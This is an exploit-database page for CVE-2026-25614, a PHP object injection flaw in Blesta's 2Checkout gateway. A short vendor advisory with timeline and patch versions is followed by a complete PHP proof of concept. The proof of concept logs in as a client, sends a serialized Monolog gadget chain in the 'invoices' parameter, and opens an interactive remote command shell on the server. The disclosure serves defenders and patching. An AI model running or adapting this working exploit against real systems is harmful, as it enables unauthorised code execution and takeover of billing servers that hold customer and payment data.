## https://sploitus.com/exploit?id=PACKETSTORM:214948
--------------------------------------------------------------------------
    Blesta <= 5.13.1 (2Checkout) Multiple PHP Object Injection Vulnerabilities
    --------------------------------------------------------------------------
    
    
    [-] Software Link:
    
    https://www.blesta.com
    
    
    [-] Affected Versions:
    
    All versions from 3.0.0 to 5.13.1.
    
    
    [-] Vulnerabilities Description:
    
    The vulnerabilities exist because user input passed through the
    "invoices" POST parameter or the "item-ext-ref" GET parameter when
    dispatching the Checkout2::validate() or Checkout2::success() method
    is not properly sanitized before being used in a call to the
    unserialize() PHP function. This can be exploited by malicious client
    users to inject arbitrary PHP objects into the application scope,
    allowing them to perform a variety of attacks, such as executing
    arbitrary PHP code (RCE). The attached proof of concept reaches command
    execution through a gadget chain built from Monolog handler classes
    (Monolog\Handler\SyslogUdpHandler / BufferHandler), so it presumably
    depends on those classes being loadable on the target installation.
    
    Successful exploitation of these issues requires the 2Checkout payment
    gateway to be installed. Note that the attached proof of concept first
    authenticates with an existing client account (username/password) and
    then posts the payload to client_pay/received/checkout2, i.e. it is
    exercised from the authenticated client area rather than anonymously.
    
    
    [-] Proof of Concept:
    
    https://karmainsecurity.com/pocs/CVE-2026-25614.php
    
    
    [-] Solution:
    
    Apply the vendor patch or upgrade to version 5.13.2 or later. Per the
    timeline below, 5.13.3 additionally fixes regressions introduced in
    5.13.2, so 5.13.3 or later is the preferable target.
    
    
    [-] Disclosure Timeline:
    
    [19/01/2026] - Vendor notified
    
    [22/01/2026] - CVE identifier requested
    
    [28/01/2026] - Version 5.13.2 released
    
    [31/01/2026] - Version 5.13.3 released to address regressions
    introduced in 5.13.2
    
    [03/02/2026] - CVE identifier assigned
    
    [04/02/2026] - Public disclosure
    
    
    [-] CVE Reference:
    
    The Common Vulnerabilities and Exposures project (cve.org) has
    assigned the name CVE-2026-25614 to these vulnerabilities.
    
    
    [-] Credits:
    
    Vulnerabilities discovered by Egidio Romano.
    
    
    [-] Other References:
    
    https://www.blesta.com/2026/01/28/security-advisory/
    
    
    [-] Original Advisory:
    
    https://karmainsecurity.com/KIS-2026-03
    
    
    --- packet storm attached poc: ---
    <?php
    
    /*
        --------------------------------------------------------------------------
        Blesta <= 5.13.1 (2Checkout) Multiple PHP Object Injection Vulnerabilities
        --------------------------------------------------------------------------
        
        author..............: Egidio Romano aka EgiX
        mail................: n0b0d13s[at]gmail[dot]com
        software link.......: https://www.blesta.com
        
        +-------------------------------------------------------------------------+
        | This proof of concept code was written for educational purpose only.    |
        | Use it at your own risk. Author will be not responsible for any damage. |
        +-------------------------------------------------------------------------+
        
        [-] Original Advisory:
    
        https://karmainsecurity.com/KIS-2026-03
    */
    
    // PoC preamble: no execution time limit (interactive shell), only fatal errors
    // reported, banner, then dependency and argument checks.
    set_time_limit(0);
    error_reporting(E_ERROR);

    $bannerLines = [
        "+-------------------------------------------------------------------+",
        "| Blesta <= 5.13.1 (2Checkout) PHP Object Injection Exploit by EgiX |",
        "+-------------------------------------------------------------------+",
    ];
    print "\n" . implode("\n", $bannerLines) . "\n";

    // All HTTP traffic goes through cURL; bail out early if the extension is missing.
    if (!extension_loaded("curl")) {
        die("\n[-] cURL extension required!\n\n");
    }

    // Expected invocation: <script> <URL> <Username> <Password>
    if ($argc !== 4) {
        print "\nUsage......: php {$argv[0]} <URL> <Username> <Password>\n";
        print "\nExample....: php {$argv[0]} http://localhost/blesta/ egix password";
        print "\nExample....: php {$argv[0]} https://www.blesta.com/ hacker pwned\n\n";
        exit;
    }
    
    /**
     * Local stand-in for Monolog\Handler\SyslogUdpHandler, used only to build
     * the serialized gadget chain (the outer object of the payload).
     *
     * The underscores in the class name are rewritten to namespace separators
     * after serialize() by the caller, so the name (same length as the real
     * one) and the single protected property "socket" must not be changed.
     */
    class Monolog_Handler_SyslogUdpHandler
    {
        /** @var mixed whatever the caller wraps, normally the BufferHandler gadget */
        protected $socket;

        /**
         * @param mixed $x value stored as the "socket" property
         */
        public function __construct($x)
        {
            $this->socket = $x;
        }
    }
    
    /**
     * Local stand-in for Monolog\Handler\BufferHandler, the inner object of the
     * serialized gadget chain.
     *
     * Property names, visibility and declaration order are part of the payload
     * (they determine the serialized form), so they mirror the real class and
     * must stay as they are. "handler" points back at the object itself.
     */
    class Monolog_Handler_BufferHandler
    {
        protected $handler;
        protected $bufferSize = -1;
        protected $buffer;
        protected $level = null;
        protected $initialized = true;
        protected $bufferLimit = -1;
        protected $processors;

        /**
         * @param mixed $methods stored as "processors"
         * @param mixed $command stored as the only element of "buffer"
         */
        public function __construct($methods, $command)
        {
            $this->handler    = $this;
            $this->processors = $methods;
            $this->buffer     = [$command];
        }
    }
    
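    /**
     * Sends one shell command to the target through the unserialize() sink.
     *
     * Builds the Monolog gadget chain with the command as the buffered record,
     * serializes it, rewrites the two stub class names to their namespaced
     * form, and posts the base64-encoded result in the "invoices" parameter of
     * the request that $ch is already pointed at. The command is suffixed with
     * "; echo CMDDELIM" so the caller can locate the end of its output in the
     * response body.
     *
     * Fix over the original: the '_' -> '\' rewrite is applied only to the two
     * class names instead of the whole serialized string. The blanket
     * str_replace silently corrupted any command containing an underscore
     * (e.g. "cat my_file" became "cat my\file"). Both spellings have the same
     * length, so the O:<len> prefixes in the payload stay valid.
     *
     * @param string $cmd shell command to run on the target
     * @return string|false raw HTTP response body, or false on a cURL failure
     */
    function exec_cmd($cmd)
    {
        global $ch;

        $cmd .= "; echo CMDDELIM";
        $chain = new Monolog_Handler_SyslogUdpHandler(
            new Monolog_Handler_BufferHandler(['current', 'system'], [$cmd, 'level' => null])
        );

        // Only the gadget class names need namespace separators; leave the command untouched.
        $payload = str_replace(
            ['Monolog_Handler_SyslogUdpHandler', 'Monolog_Handler_BufferHandler'],
            ['Monolog\\Handler\\SyslogUdpHandler', 'Monolog\\Handler\\BufferHandler'],
            serialize($chain)
        );

        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["invoices" => base64_encode($payload)]));

        return curl_exec($ch);
    }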
    
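    // Accept the base URL with or without a trailing slash; the paths below are appended to it.
    $url  = rtrim($argv[1], '/') . '/';
    $user = $argv[2];
    $pwd  = $argv[3];
    $ch   = curl_init();

    // Start from a clean cookie jar so a stale session from a previous run is not reused.
    if (file_exists("./cookies.txt")) {
        unlink("./cookies.txt");
    }

    curl_setopt($ch, CURLOPT_URL, "{$url}client/login/");
    curl_setopt($ch, CURLOPT_COOKIEJAR, "./cookies.txt");
    curl_setopt($ch, CURLOPT_COOKIEFILE, "./cookies.txt");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    // NOTE(review): TLS verification is disabled, which is convenient for self-signed lab
    // targets but hands the client credentials to anyone able to intercept the connection.
    // Re-enable both options when pointing this at anything over an untrusted network.
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    // Uncomment to route traffic through an intercepting proxy for inspection.
    //curl_setopt($ch, CURLOPT_PROXY, 'http://127.0.0.1:8080');

    print "\n[+] Performing client login with username '{$user}' and password '{$pwd}'\n";

    // The login form carries a CSRF token; fetch the form first and pull it out of the HTML.
    if (!preg_match('/"_csrf_token" value="([^"]+)/i', curl_exec($ch), $token)) {
        die("[-] CSRF token not found!\n\n");
    }

    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["_csrf_token" => $token[1], "username" => $user, "password" => $pwd]));

    // A failed login is signalled by an "alert-danger" box in the response.
    if (preg_match('/alert-danger/i', curl_exec($ch))) {
        die("[-] Login failed!\n\n");
    }

    print "[+] Launching shell\n";

    // Every command from here on is posted to the 2Checkout callback endpoint.
    curl_setopt($ch, CURLOPT_URL, "{$url}client_pay/received/checkout2");

    while (true) {
        print "\nblesta-shell# ";

        // fgets() returns false on EOF (e.g. piped input exhausted); the original
        // coerced that to "" and looped forever, firing empty commands at the target.
        $line = fgets(STDIN);
        if ($line === false) {
            break;
        }

        $cmd = trim($line);
        if ($cmd === "exit") {
            break;
        }

        // Output is everything up to the CMDDELIM marker appended by exec_cmd().
        if (!preg_match('/(.*)CMDDELIM/s', exec_cmd($cmd), $m)) {
            die("\n[-] Exploit failed!\n\n");
        }
        print $m[1];
    }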